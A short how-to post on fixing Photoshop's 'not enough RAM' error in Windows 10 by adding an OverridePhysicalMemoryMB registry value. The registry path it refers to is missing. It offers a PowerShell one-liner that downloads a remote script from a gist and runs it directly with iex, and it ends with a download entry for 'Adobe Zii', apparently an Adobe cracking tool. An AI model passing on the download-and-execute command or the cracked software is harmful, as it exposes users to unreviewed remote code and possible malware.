In this topic, I will show you an easy solutions to get rid of “NOT ENOUGH RAM” error with Photoshop in Windows 10.
Take the following step to fix the issue.
- just close all Adobe softwares, press Windows + R to go to Run field and type Regedit > Enter, then go to
- Right Mouse on 120.0 and create new DWORD
- Change DWORD to “OverridePhysicalMemoryMB”.
- Switch from “Hexadecimal” to “Decimal”.
- At Value data: Enter a number that is equal to your Memory (for example, 4Gb Ram, you enter 4096).
To make all above steps quicker, you just need to run one command line through CMD or PowerShell.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/mavaddat/d450dcd63c9c4edd27124b045a777585/raw/22f985325c9fdc99356f57a1d6ed60c2fa3144e2/fixphotoshopmem.ps1 ')"
DOWNLOAD ZII 4.3.6
|Filename:||Adobe Zii 4.3.6.zip (download)|